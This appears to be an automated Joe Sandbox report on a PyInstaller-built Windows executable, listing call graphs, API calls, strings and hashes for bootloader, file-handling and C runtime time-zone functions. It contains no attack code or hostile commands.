18176 7ff6d6e979d0 18098->18176 18100 7ff6d6e97ee0 18103 7ff6d6e92c30 59 API calls 18100->18103 18101 7ff6d6e97d70 61 API calls 18108 7ff6d6e97ea2 __std_exception_copy 18101->18108 18103->18107 18104 7ff6d6e92c30 59 API calls 18104->18098 18106 7ff6d6e97f14 18106->18104 18107->18095 18108->18100 18108->18106 18128 7ff6d6e912b2 18127->18128 18129 7ff6d6e94060 116 API calls 18128->18129 18130 7ff6d6e912e2 18129->18130 18131 7ff6d6e91301 18130->18131 18132 7ff6d6e912ea 18130->18132 18134 7ff6d6ea1004 73 API calls 18131->18134 18133 7ff6d6e92b10 59 API calls 18132->18133 18162 7ff6d6e912fa __std_exception_copy 18133->18162 18135 7ff6d6e91313 18134->18135 18136 7ff6d6e91317 18135->18136 18137 7ff6d6e9133d 18135->18137 18138 7ff6d6e92870 59 API calls 18136->18138 18142 7ff6d6e91380 18137->18142 18143 7ff6d6e91358 18137->18143 18139 7ff6d6e9132e 18138->18139 18141 7ff6d6ea097c 74 API calls 18139->18141 18140 7ff6d6e9c010 _wfindfirst32i64 8 API calls 18146 7ff6d6e91444 18140->18146 18141->18162 18145 7ff6d6e9139a 18142->18145 18157 7ff6d6e91453 18142->18157 18144 7ff6d6e92870 59 API calls 18143->18144 18147 7ff6d6e91373 18144->18147 18148 7ff6d6e91050 98 API calls 18145->18148 18146->18008 18146->18012 18150 7ff6d6ea097c 74 API calls 18147->18150 18151 7ff6d6e913ab 18148->18151 18149 7ff6d6e913b3 18152 7ff6d6ea097c 74 API calls 18149->18152 18150->18162 18151->18149 18153 7ff6d6e914c2 __std_exception_copy 18151->18153 18154 7ff6d6e913bf 18152->18154 18155 7ff6d6ea0ccc _fread_nolock 53 API calls 18155->18157 18157->18149 18157->18155 18159 7ff6d6e914ab 18157->18159 18160 7ff6d6e92870 59 API calls 18159->18160 18160->18153 18162->18140 18171 7ff6d6e93ffa 18170->18171 18172 7ff6d6e98de0 57 API calls 18171->18172 18173 7ff6d6e94022 18172->18173 18174 7ff6d6e9c010 _wfindfirst32i64 8 API calls 18173->18174 18175 7ff6d6e9404a 18174->18175 18175->18098 18175->18101 18175->18108 18177 7ff6d6e979e0 18176->18177 18178 7ff6d6e91ee0 49 API calls 18177->18178 18250 7ff6d6e931c4 18249->18250 18251 7ff6d6ea52b4 49 API calls 18250->18251 18252 7ff6d6e931ea 18251->18252 18253 7ff6d6e931fb 18252->18253 18309 7ff6d6ea65dc 18252->18309 18255 7ff6d6e9c010 _wfindfirst32i64 8 API calls 18253->18255 18256 7ff6d6e93219 18255->18256 18256->18052 18258 7ff6d6e977be 18257->18258 18259 7ff6d6e94060 116 API calls 18258->18259 18260 7ff6d6e977ed 18259->18260 18261 7ff6d6e91ee0 49 API calls 18260->18261 18310 7ff6d6ea6605 18309->18310 18311 7ff6d6ea65f9 18309->18311 18351 7ff6d6ea5788 18310->18351 18326 7ff6d6ea5ef0 18311->18326 18327 7ff6d6ea5f27 18326->18327 18328 7ff6d6ea5f0a 18326->18328 18327->18328 18568 7ff6d6ea6918 18567->18568 18569 7ff6d6ea693e 18568->18569 18572 7ff6d6ea6971 18568->18572 18570 7ff6d6ea5cb4 _set_fmode 11 API calls 18569->18570 18571 7ff6d6ea6943 18570->18571 18573 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 18571->18573 18574 7ff6d6ea6984 18572->18574 18575 7ff6d6ea6977 18572->18575 18576 7ff6d6e940b9 18573->18576 18586 7ff6d6eab9e0 18574->18586 18577 7ff6d6ea5cb4 _set_fmode 11 API calls 18575->18577 18576->16822 18577->18576 18599 7ff6d6eb11a8 EnterCriticalSection 18586->18599 18947 7ff6d6ea98c4 18946->18947 18950 7ff6d6ea93a0 18947->18950 18951 7ff6d6ea93ea 18950->18951 18952 7ff6d6ea93bb 18950->18952 18960 7ff6d6ea5b5c EnterCriticalSection 18951->18960 18954 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 18952->18954 18957 7ff6d6ea93db 18954->18957 18962 7ff6d6ea07a1 18961->18962 18963 7ff6d6ea0773 18961->18963 18965 7ff6d6ea0793 18962->18965 18971 7ff6d6ea5b5c EnterCriticalSection 18962->18971 18964 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 18963->18964 18964->18965 18973 7ff6d6e94060 116 API calls 18972->18973 18974 7ff6d6e915b7 18973->18974 18975 7ff6d6e915bf 18974->18975 18976 7ff6d6e915e0 18974->18976 18978 7ff6d6e92b10 59 API calls 18975->18978 18977 7ff6d6ea1004 73 API calls 18976->18977 18980 7ff6d6e915f1 18977->18980 18979 7ff6d6e915cf 18978->18979 18979->16841 18981 7ff6d6e91611 18980->18981 18982 7ff6d6e915f5 18980->18982 18984 7ff6d6e91641 18981->18984 18985 7ff6d6e91621 18981->18985 18983 7ff6d6e92870 59 API calls 18982->18983 18994 7ff6d6e9160c __std_exception_copy 18983->18994 18988 7ff6d6e91656 18984->18988 18992 7ff6d6e9166d 18984->18992 18987 7ff6d6e92870 59 API calls 18985->18987 18986 7ff6d6ea097c 74 API calls 18989 7ff6d6e916e7 18986->18989 18987->18994 18990 7ff6d6e91050 98 API calls 18988->18990 18989->16841 18990->18994 18991 7ff6d6ea0ccc _fread_nolock 53 API calls 18991->18992 18992->18991 18993 7ff6d6e916ae 18992->18993 18992->18994 18995 7ff6d6e92870 59 API calls 18993->18995 18994->18986 18995->18994 18998 7ff6d6e919c3 18996->18998 18999 7ff6d6e9195f 18996->18999 18997 7ff6d6ea5860 45 API calls 18997->18999 18998->16860 18999->18997 18999->18998 19001 7ff6d6e98de0 57 API calls 19000->19001 19002 7ff6d6e98487 LoadLibraryExW 19001->19002 19003 7ff6d6e984a4 __std_exception_copy 19002->19003 19003->16868 19064 7ff6d6e95de0 19063->19064 19065 7ff6d6e91ee0 49 API calls 19064->19065 19066 7ff6d6e95e12 19065->19066 19067 7ff6d6e95e3b 19066->19067 19068 7ff6d6e95e1b 19066->19068 19070 7ff6d6e95e92 19067->19070 19072 7ff6d6e94140 49 API calls 19067->19072 19069 7ff6d6e92b10 59 API calls 19068->19069 19071 7ff6d6e95e31 19069->19071 19073 7ff6d6e94140 49 API calls 19070->19073 19078 7ff6d6e9c010 _wfindfirst32i64 8 API calls 19071->19078 19075 7ff6d6e95e5c 19072->19075 19074 7ff6d6e95eab 19073->19074 19076 7ff6d6e95ec9 19074->19076 19079 7ff6d6e92b10 59 API calls 19074->19079 19077 7ff6d6e95e7a 19075->19077 19081 7ff6d6e92b10 59 API calls 19075->19081 19080 7ff6d6e98470 58 API calls 19076->19080 19082 7ff6d6e93ff0 57 API calls 19077->19082 19083 7ff6d6e9344e 19078->19083 19079->19076 19084 7ff6d6e95ed6 19080->19084 19081->19077 19085 7ff6d6e95e84 19082->19085 19083->16889 19091 7ff6d6e95f30 19083->19091 19086 7ff6d6e95edb 19084->19086 19087 7ff6d6e95efd 19084->19087 19085->19070 19090 7ff6d6e98470 58 API calls 19085->19090 19088 7ff6d6e929c0 57 API calls 19086->19088 19161 7ff6d6e953f0 GetProcAddress 19087->19161 19088->19071 19090->19070 19245 7ff6d6e94ff0 19091->19245 19093 7ff6d6e95f54 19094 7ff6d6e95f5c 19093->19094 19095 7ff6d6e95f6d 19093->19095 19097 7ff6d6e92b10 59 API calls 19094->19097 19252 7ff6d6e94730 19095->19252 19162 7ff6d6e95430 GetProcAddress 19161->19162 19163 7ff6d6e95412 19161->19163 19162->19163 19164 7ff6d6e95455 GetProcAddress 19162->19164 19166 7ff6d6e929c0 57 API calls 19163->19166 19164->19163 19247 7ff6d6e95015 19245->19247 19246 7ff6d6e9501d 19246->19093 19247->19246 19250 7ff6d6e951af 19247->19250 19287 7ff6d6ea74f4 19247->19287 19248 7ff6d6e9535a __std_exception_copy 19248->19093 19249 7ff6d6e94450 47 API calls 19249->19250 19250->19248 19250->19249 19288 7ff6d6ea7524 19287->19288 19291 7ff6d6ea69f0 19288->19291 19518 7ff6d6e9b1cc 19520 7ff6d6e9a5d3 19518->19520 19521 7ff6d6e9a656 19518->19521 19519 7ff6d6e9b850 12 API calls 19519->19521 19520->19519 19520->19521

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FF6D6E91000 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 293windowCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 63 7ff6d6e91000-7ff6d6e939b6 call 7ff6d6ea0750 call 7ff6d6ea0748 call 7ff6d6e989b0 call 7ff6d6ea0748 call 7ff6d6e9bfb0 call 7ff6d6ea5ae0 call 7ff6d6ea66e8 call 7ff6d6e91ea0 81 7ff6d6e93b5f 63->81 82 7ff6d6e939bc-7ff6d6e939cc call 7ff6d6e93f00 63->82 84 7ff6d6e93b64-7ff6d6e93b84 call 7ff6d6e9c010 81->84 82->81 87 7ff6d6e939d2-7ff6d6e939e5 call 7ff6d6e93dd0 82->87 87->81 91 7ff6d6e939eb-7ff6d6e93a12 call 7ff6d6e97d70 87->91 94 7ff6d6e93a54-7ff6d6e93a7c call 7ff6d6e98250 call 7ff6d6e91ca0 91->94 95 7ff6d6e93a14-7ff6d6e93a23 call 7ff6d6e97d70 91->95 106 7ff6d6e93a82-7ff6d6e93a98 call 7ff6d6e91ca0 94->106 107 7ff6d6e93b2d-7ff6d6e93b3e 94->107 95->94 101 7ff6d6e93a25-7ff6d6e93a2b 95->101 103 7ff6d6e93a37-7ff6d6e93a51 call 7ff6d6ea576c call 7ff6d6e98250 101->103 104 7ff6d6e93a2d-7ff6d6e93a35 101->104 103->94 104->103 120 7ff6d6e93ab7-7ff6d6e93aba 106->120 121 7ff6d6e93a9a-7ff6d6e93ab2 call 7ff6d6e92b10 106->121 110 7ff6d6e93b40-7ff6d6e93b47 107->110 111 7ff6d6e93b92-7ff6d6e93b95 107->111 110->111 116 7ff6d6e93b49-7ff6d6e93b51 call 7ff6d6e98b80 110->116 114 7ff6d6e93b97-7ff6d6e93b9d 111->114 115 7ff6d6e93bab-7ff6d6e93bc3 call 7ff6d6e98de0 111->115 122 7ff6d6e93b9f-7ff6d6e93ba9 114->122 123 7ff6d6e93bdb-7ff6d6e93be8 call 7ff6d6e96ff0 114->123 130 7ff6d6e93bce-7ff6d6e93bd5 SetDllDirectoryW 115->130 131 7ff6d6e93bc5-7ff6d6e93bcc 115->131 132 7ff6d6e93b53 116->132 133 7ff6d6e93b85-7ff6d6e93b88 call 7ff6d6e914e0 116->133 120->107 124 7ff6d6e93abc-7ff6d6e93ad3 call 7ff6d6e94060 120->124 121->81 122->115 122->123 138 7ff6d6e93c33-7ff6d6e93c38 call 7ff6d6e96f70 123->138 139 7ff6d6e93bea-7ff6d6e93bf7 call 7ff6d6e96ca0 123->139 141 7ff6d6e93ad5-7ff6d6e93ad8 124->141 142 7ff6d6e93ada-7ff6d6e93b06 call 7ff6d6e984c0 124->142 130->123 137 7ff6d6e93b5a call 7ff6d6e92b10 131->137 132->137 146 7ff6d6e93b8d-7ff6d6e93b90 133->146 137->81 149 7ff6d6e93c3d-7ff6d6e93c40 138->149 139->138 154 7ff6d6e93bf9-7ff6d6e93c08 call 7ff6d6e96800 139->154 147 7ff6d6e93b15-7ff6d6e93b2b call 7ff6d6e92b10 141->147 142->107 156 7ff6d6e93b08-7ff6d6e93b10 call 7ff6d6ea097c 142->156 146->81 146->111 147->81 152 7ff6d6e93d11-7ff6d6e93d20 call 7ff6d6e934a0 149->152 153 7ff6d6e93c46-7ff6d6e93c50 149->153 152->81 166 7ff6d6e93d26-7ff6d6e93d55 call 7ff6d6e98b50 call 7ff6d6e981e0 call 7ff6d6e97d70 call 7ff6d6e93600 152->166 157 7ff6d6e93c53-7ff6d6e93c5d 153->157 170 7ff6d6e93c29-7ff6d6e93c2e call 7ff6d6e96a50 154->170 171 7ff6d6e93c0a-7ff6d6e93c16 call 7ff6d6e96780 154->171 156->147 163 7ff6d6e93c5f-7ff6d6e93c64 157->163 164 7ff6d6e93c66-7ff6d6e93c68 157->164 163->157 163->164 168 7ff6d6e93cb1-7ff6d6e93cb7 164->168 169 7ff6d6e93c6a-7ff6d6e93c8d call 7ff6d6e91ee0 164->169 199 7ff6d6e93d57-7ff6d6e93d74 PostMessageW GetMessageW 166->199 200 7ff6d6e93d7a-7ff6d6e93daa call 7ff6d6e98290 call 7ff6d6e96a50 call 7ff6d6e96f70 166->200 173 7ff6d6e93cb9-7ff6d6e93cd6 PostMessageW GetMessageW 168->173 174 7ff6d6e93cdc-7ff6d6e93d0c call 7ff6d6e93600 call 7ff6d6e93440 call 7ff6d6e935f0 call 7ff6d6e96a50 call 7ff6d6e96f70 168->174 169->81 185 7ff6d6e93c93-7ff6d6e93c9d 169->185 170->138 171->170 182 7ff6d6e93c18-7ff6d6e93c27 call 7ff6d6e96e40 171->182 173->174 174->84 182->149 186 7ff6d6e93ca0-7ff6d6e93caf 185->186 186->168 186->186 199->200 210 7ff6d6e93db8-7ff6d6e93dbb call 7ff6d6e91e70 200->210 211 7ff6d6e93dac-7ff6d6e93db3 call 7ff6d6e97f50 200->211 214 7ff6d6e93dc0-7ff6d6e93dc2 210->214 211->210 214->84
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$EnvironmentPost$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                            • API String ID: 2647325126-1544818733
                                                                                                                                                            • Opcode ID: c24b068d907f4d3a9411edbdac7868b91bda648b49eb6d755cb9cb2029497688
                                                                                                                                                            • Instruction ID: fb72ec2e62fd3e51265509b4057bf3564d27dc46955d8f0f6da667a3b5fad83d
                                                                                                                                                            • Opcode Fuzzy Hash: c24b068d907f4d3a9411edbdac7868b91bda648b49eb6d755cb9cb2029497688
                                                                                                                                                            • Instruction Fuzzy Hash: E0C16F61F0CA4691FE24EB2595512BE63A1BF8478CF444133EA4DC769BEF2EE925C700
                                                                                                                                                            Function 00007FF6D6EB6B50 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 263 7ff6d6eb6b50-7ff6d6eb6b8b call 7ff6d6eb64d8 call 7ff6d6eb64e0 call 7ff6d6eb6548 270 7ff6d6eb6b91-7ff6d6eb6b9c call 7ff6d6eb64e8 263->270 271 7ff6d6eb6db5-7ff6d6eb6e01 call 7ff6d6eab6b8 call 7ff6d6eb64d8 call 7ff6d6eb64e0 call 7ff6d6eb6548 263->271 270->271 276 7ff6d6eb6ba2-7ff6d6eb6bac 270->276 296 7ff6d6eb6f3f-7ff6d6eb6fad call 7ff6d6eab6b8 call 7ff6d6eb23d0 271->296 297 7ff6d6eb6e07-7ff6d6eb6e12 call 7ff6d6eb64e8 271->297 279 7ff6d6eb6bce-7ff6d6eb6bd2 276->279 280 7ff6d6eb6bae-7ff6d6eb6bb1 276->280 283 7ff6d6eb6bd5-7ff6d6eb6bdd 279->283 282 7ff6d6eb6bb4-7ff6d6eb6bbf 280->282 285 7ff6d6eb6bc1-7ff6d6eb6bc8 282->285 286 7ff6d6eb6bca-7ff6d6eb6bcc 282->286 283->283 287 7ff6d6eb6bdf-7ff6d6eb6bf2 call 7ff6d6eae3ac 283->287 285->282 285->286 286->279 289 7ff6d6eb6bfb-7ff6d6eb6c09 286->289 294 7ff6d6eb6bf4-7ff6d6eb6bf6 call 7ff6d6eab700 287->294 295 7ff6d6eb6c0a-7ff6d6eb6c16 call 7ff6d6eab700 287->295 294->289 303 7ff6d6eb6c1d-7ff6d6eb6c25 295->303 317 7ff6d6eb6faf-7ff6d6eb6fb6 296->317 318 7ff6d6eb6fbb-7ff6d6eb6fbe 296->318 297->296 307 7ff6d6eb6e18-7ff6d6eb6e23 call 7ff6d6eb6518 297->307 303->303 306 7ff6d6eb6c27-7ff6d6eb6c38 call 7ff6d6eb1344 303->306 306->271 315 7ff6d6eb6c3e-7ff6d6eb6c94 call 7ff6d6ebb580 * 4 call 7ff6d6eb6a6c 306->315 307->296 316 7ff6d6eb6e29-7ff6d6eb6e4c call 7ff6d6eab700 GetTimeZoneInformation 307->316 376 7ff6d6eb6c96-7ff6d6eb6c9a 315->376 333 7ff6d6eb6f14-7ff6d6eb6f3e call 7ff6d6eb64d0 call 7ff6d6eb64c0 call 7ff6d6eb64c8 316->333 334 7ff6d6eb6e52-7ff6d6eb6e73 316->334 319 7ff6d6eb704b-7ff6d6eb704e 317->319 320 7ff6d6eb6fc0 318->320 321 7ff6d6eb6ff5-7ff6d6eb7008 call 7ff6d6eae3ac 318->321 324 7ff6d6eb6fc3 call 7ff6d6eb6dcc 319->324 326 7ff6d6eb7054-7ff6d6eb705c call 7ff6d6eb6b50 319->326 320->324 341 7ff6d6eb7013-7ff6d6eb702e call 7ff6d6eb23d0 321->341 342 7ff6d6eb700a 321->342 338 7ff6d6eb6fc8-7ff6d6eb6ff4 call 7ff6d6eab700 call 7ff6d6e9c010 324->338 326->338 335 7ff6d6eb6e7e-7ff6d6eb6e85 334->335 336 7ff6d6eb6e75-7ff6d6eb6e7b 334->336 344 7ff6d6eb6e99 335->344 345 7ff6d6eb6e87-7ff6d6eb6e8f 335->345 336->335 357 7ff6d6eb7030-7ff6d6eb7033 341->357 358 7ff6d6eb7035-7ff6d6eb7047 call 7ff6d6eab700 341->358 349 7ff6d6eb700c-7ff6d6eb7011 call 7ff6d6eab700 342->349 355 7ff6d6eb6e9b-7ff6d6eb6f0f call 7ff6d6ebb580 * 4 call 7ff6d6eb39ac call 7ff6d6eb7064 * 2 344->355 345->344 351 7ff6d6eb6e91-7ff6d6eb6e97 345->351 349->320 351->355 355->333 357->349 358->319 377 7ff6d6eb6ca0-7ff6d6eb6ca4 376->377 378 7ff6d6eb6c9c 376->378 377->376 380 7ff6d6eb6ca6-7ff6d6eb6ccb call 7ff6d6ea75a8 377->380 378->377 386 7ff6d6eb6cce-7ff6d6eb6cd2 380->386 388 7ff6d6eb6ce1-7ff6d6eb6ce5 386->388 389 7ff6d6eb6cd4-7ff6d6eb6cdf 386->389 388->386 389->388 392 7ff6d6eb6ce7-7ff6d6eb6ceb 389->392 394 7ff6d6eb6d6c-7ff6d6eb6d70 392->394 395 7ff6d6eb6ced-7ff6d6eb6d15 call 7ff6d6ea75a8 392->395 396 7ff6d6eb6d72-7ff6d6eb6d74 394->396 397 7ff6d6eb6d77-7ff6d6eb6d84 394->397 403 7ff6d6eb6d33-7ff6d6eb6d37 395->403 404 7ff6d6eb6d17 395->404 396->397 399 7ff6d6eb6d9f-7ff6d6eb6dae call 7ff6d6eb64d0 call 7ff6d6eb64c0 397->399 400 7ff6d6eb6d86-7ff6d6eb6d9c call 7ff6d6eb6a6c 397->400 399->271 400->399 403->394 406 7ff6d6eb6d39-7ff6d6eb6d57 call 7ff6d6ea75a8 403->406 408 7ff6d6eb6d1a-7ff6d6eb6d21 404->408 415 7ff6d6eb6d63-7ff6d6eb6d6a 406->415 408->403 411 7ff6d6eb6d23-7ff6d6eb6d31 408->411 411->403 411->408 415->394 416 7ff6d6eb6d59-7ff6d6eb6d5d 415->416 416->394 417 7ff6d6eb6d5f 416->417 417->415
                                                                                                                                                            APIs
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6D6EB6B95
                                                                                                                                                              • Part of subcall function 00007FF6D6EB64E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB64FC
                                                                                                                                                              • Part of subcall function 00007FF6D6EAB700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB716
                                                                                                                                                              • Part of subcall function 00007FF6D6EAB700: GetLastError.KERNEL32(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB720
                                                                                                                                                              • Part of subcall function 00007FF6D6EAB6B8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6D6EAB697,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAB6C1
                                                                                                                                                              • Part of subcall function 00007FF6D6EAB6B8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6D6EAB697,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAB6E6
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6D6EB6B84
                                                                                                                                                              • Part of subcall function 00007FF6D6EB6548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB655C
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6D6EB6DFA
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6D6EB6E0B
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6D6EB6E1C
                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D6EB705C), ref: 00007FF6D6EB6E43
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                            • API String ID: 1458651798-690618308
                                                                                                                                                            • Opcode ID: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
                                                                                                                                                            • Instruction ID: e849a53e16de95562038c68f6dbbf4888240c7bf522c5c5a402cae3408671e4c
                                                                                                                                                            • Opcode Fuzzy Hash: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
                                                                                                                                                            • Instruction Fuzzy Hash: 58D1BD26E1C3128AEB24EF2AD8505BD7761FF84B84F444137EA4D87A95DE3EE4618B40
                                                                                                                                                            Function 00007FF6D6EB7A9C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 448 7ff6d6eb7a9c-7ff6d6eb7b0f call 7ff6d6eb77d0 451 7ff6d6eb7b11-7ff6d6eb7b1a call 7ff6d6ea5c94 448->451 452 7ff6d6eb7b29-7ff6d6eb7b33 call 7ff6d6ea8c58 448->452 457 7ff6d6eb7b1d-7ff6d6eb7b24 call 7ff6d6ea5cb4 451->457 458 7ff6d6eb7b4e-7ff6d6eb7bb7 CreateFileW 452->458 459 7ff6d6eb7b35-7ff6d6eb7b4c call 7ff6d6ea5c94 call 7ff6d6ea5cb4 452->459 474 7ff6d6eb7e6a-7ff6d6eb7e8a 457->474 460 7ff6d6eb7c34-7ff6d6eb7c3f GetFileType 458->460 461 7ff6d6eb7bb9-7ff6d6eb7bbf 458->461 459->457 467 7ff6d6eb7c41-7ff6d6eb7c7c GetLastError call 7ff6d6ea5c28 CloseHandle 460->467 468 7ff6d6eb7c92-7ff6d6eb7c99 460->468 464 7ff6d6eb7c01-7ff6d6eb7c2f GetLastError call 7ff6d6ea5c28 461->464 465 7ff6d6eb7bc1-7ff6d6eb7bc5 461->465 464->457 465->464 472 7ff6d6eb7bc7-7ff6d6eb7bff CreateFileW 465->472 467->457 483 7ff6d6eb7c82-7ff6d6eb7c8d call 7ff6d6ea5cb4 467->483 470 7ff6d6eb7ca1-7ff6d6eb7ca4 468->470 471 7ff6d6eb7c9b-7ff6d6eb7c9f 468->471 478 7ff6d6eb7caa-7ff6d6eb7cff call 7ff6d6ea8b70 470->478 479 7ff6d6eb7ca6 470->479 471->478 472->460 472->464 486 7ff6d6eb7d01-7ff6d6eb7d0d call 7ff6d6eb79d8 478->486 487 7ff6d6eb7d1e-7ff6d6eb7d4f call 7ff6d6eb7550 478->487 479->478 483->457 486->487 495 7ff6d6eb7d0f 486->495 493 7ff6d6eb7d51-7ff6d6eb7d53 487->493 494 7ff6d6eb7d55-7ff6d6eb7d97 487->494 496 7ff6d6eb7d11-7ff6d6eb7d19 call 7ff6d6eab878 493->496 497 7ff6d6eb7db9-7ff6d6eb7dc4 494->497 498 7ff6d6eb7d99-7ff6d6eb7d9d 494->498 495->496 496->474 500 7ff6d6eb7e68 497->500 501 7ff6d6eb7dca-7ff6d6eb7dce 497->501 498->497 499 7ff6d6eb7d9f-7ff6d6eb7db4 498->499 499->497 500->474 501->500 503 7ff6d6eb7dd4-7ff6d6eb7e19 CloseHandle CreateFileW 501->503 505 7ff6d6eb7e4e-7ff6d6eb7e63 503->505 506 7ff6d6eb7e1b-7ff6d6eb7e49 GetLastError call 7ff6d6ea5c28 call 7ff6d6ea8d98 503->506 505->500 506->505
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                            • Opcode ID: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                                                                                                                            • Instruction ID: 286e87da1147fecf4430cb9469f9f440caf7687606c944a9bc66a5a941c53700
                                                                                                                                                            • Opcode Fuzzy Hash: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                                                                                                                            • Instruction Fuzzy Hash: DFC1B036F2CB5685EB10CF68C4906BC3771EB49B98B01123ADA1E9B794DF39D465C740
                                                                                                                                                            Function 00007FF6D6E97B60 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6D6E9153F), ref: 00007FF6D6E97BF7
                                                                                                                                                              • Part of subcall function 00007FF6D6E97D70: GetEnvironmentVariableW.KERNEL32(00007FF6D6E939FF), ref: 00007FF6D6E97DAA
                                                                                                                                                              • Part of subcall function 00007FF6D6E97D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6D6E97DC7
